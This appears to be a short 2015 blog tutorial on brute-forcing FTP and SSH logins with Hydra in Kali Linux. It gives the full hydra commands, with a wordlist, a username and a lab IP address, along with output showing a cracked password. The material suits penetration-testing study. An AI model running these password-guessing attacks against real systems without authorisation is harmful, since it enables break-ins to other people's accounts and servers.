Friday, 17 April 2015

Attacking FTP and SSH using Hydra in Kali Linux


In this tutorial, we will launch an automated password guessing attack against a FTP Server and SSH server.

We will use 'hydra' in Kali Linux for the attack. We will provide 'hydra' with a wordlist of potential passwords. 'hydra' will try to authenticate using username 'shabbir' and the words in the wordlist as passwords.

1) Attacking FTP Server

root@kali:~# hydra -l shabbir -P /usr/share/wordlists/fasttrack.txt  ftp://192.168.122.1
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-04-17 19:58:04
[DATA] 16 tasks, 1 server, 133 login tries (l:1/p:133), ~8 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.122.1   login: shabbir   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-17 19:58:08

where 
  -l shabbir : 'shabbir' is the login name
 -P /usr/share/wordlists/fasttrack.txt : is the wordlist 
  ftp://192.168.122.1 : is the server being attacked

2) Attacking SSH Server

root@kali:~# hydra -l shabbir -P /usr/share/wordlists/fasttrack.txt  192.168.122.1 ssh -s 22
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-04-17 20:02:18
[DATA] 16 tasks, 1 server, 133 login tries (l:1/p:133), ~8 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.122.1   login: shabbir   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-17 20:02:22

where 
  -l shabbir : 'shabbir' is the login name
 -P /usr/share/wordlists/fasttrack.txt : is the wordlist 
  192.168.122.1 : is the server being attacked

No comments:

Post a Comment